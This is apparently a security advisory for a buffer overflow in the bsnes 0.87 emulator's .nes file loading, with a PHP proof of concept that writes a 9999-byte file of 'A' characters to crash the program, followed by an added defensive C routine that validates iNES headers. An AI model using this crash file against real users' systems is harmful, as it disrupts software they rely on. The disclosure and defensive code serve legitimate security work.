Release date:
Updated on:
Affected Systems:
Byuu bsnes 0.87
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53684
bsnes is an SNES emulator that runs on Linux, Mac OS X, and Windows.
bsnes 0.87 has a buffer overflow vulnerability in its processing of '.nes' files. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: Pr0T3cT10n (pr0t3ct10n@gmail.com)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
<?php
# Bsnes v0.87 Local Denial Of Service
# Tested on Windows 7 64Bit
# Software Site: http://byuu.org/bsnes/
# Software Download: http://www.emulator-zone.com/download.php/emulators/snes/bsnes/bsnes_v087-64bit.7z
# Author: Pr0T3cT10n
##################################################################
# Bsnes v0.87 is vulnerable to local denial of service attack.
# When we try to open a file by 'Cartridge' -> 'Load NES Cartridge'
# That contains 9999 chars ('A'), so bsnes should crash.
##################################################################
# PoC/Code:
$buffer = str_repeat('A', 9999); # Create 9999 chars ('A')..
if (file_put_contents('crash.nes', $buffer)) {
    echo("File created successfully.\r\nbsnes should crash when you open the file with it.\r\n");
} else {
    echo("Can't create file. Please try again.\r\n");
}
# Cya :)
# 0x31337.net
####################
?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Byuu
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users of the software check the vendor's homepage for the latest version:
http://byuu.org/bsnes/
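
Added example (not part of the original advisory and not bsnes code): the advisory does not identify where the overflow occurs, so the C function below shows a general pre-load check rather than the fix for this bug. It validates the 16-byte iNES header of an untrusted '.nes' image and rejects the 9999-byte 'A' file from the test above; all function and type names are hypothetical.

```c
/* Added example: validate an iNES image before loading. All names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INES_HEADER_LEN  16u
#define INES_TRAINER_LEN 512u
#define PRG_UNIT (16u * 1024u)   /* header byte 4 counts 16 KiB PRG ROM banks */
#define CHR_UNIT (8u * 1024u)    /* header byte 5 counts 8 KiB CHR ROM banks  */

enum ines_status { INES_OK = 0, INES_TOO_SHORT, INES_BAD_MAGIC, INES_TRUNCATED };
struct ines_layout { size_t prg_offset, prg_len, chr_offset, chr_len; };

/* Check `len` untrusted bytes; `out` must be non-NULL and is filled only on INES_OK. */
enum ines_status ines_validate(const uint8_t *img, size_t len, struct ines_layout *out)
{
    static const uint8_t magic[4] = { 'N', 'E', 'S', 0x1A };

    if (img == NULL || len < INES_HEADER_LEN)
        return INES_TOO_SHORT;
    if (memcmp(img, magic, sizeof magic) != 0)
        return INES_BAD_MAGIC;

    size_t prg_len = (size_t)img[4] * PRG_UNIT;               /* at most 255 banks */
    size_t chr_len = (size_t)img[5] * CHR_UNIT;               /* at most 255 banks */
    size_t trainer = (img[6] & 0x04) ? INES_TRAINER_LEN : 0;  /* flags 6, bit 2    */
    size_t need = INES_HEADER_LEN + trainer + prg_len + chr_len;

    /* Sizes claimed by the header must fit inside the bytes actually read. */
    if (need > len)
        return INES_TRUNCATED;

    out->prg_offset = INES_HEADER_LEN + trainer;
    out->prg_len = prg_len;
    out->chr_offset = out->prg_offset + prg_len;
    out->chr_len = chr_len;
    return INES_OK;
}

int main(void)
{
    static uint8_t poc[9999];   /* constructed sample: same content as crash.nes above */
    struct ines_layout lay;
    memset(poc, 'A', sizeof poc);
    printf("status=%d\n", (int)ines_validate(poc, sizeof poc, &lay));
    return 0;
}
```

A loader that copies PRG and CHR data only from the offsets and lengths returned on INES_OK never reads past the end of the file, whatever the header claims.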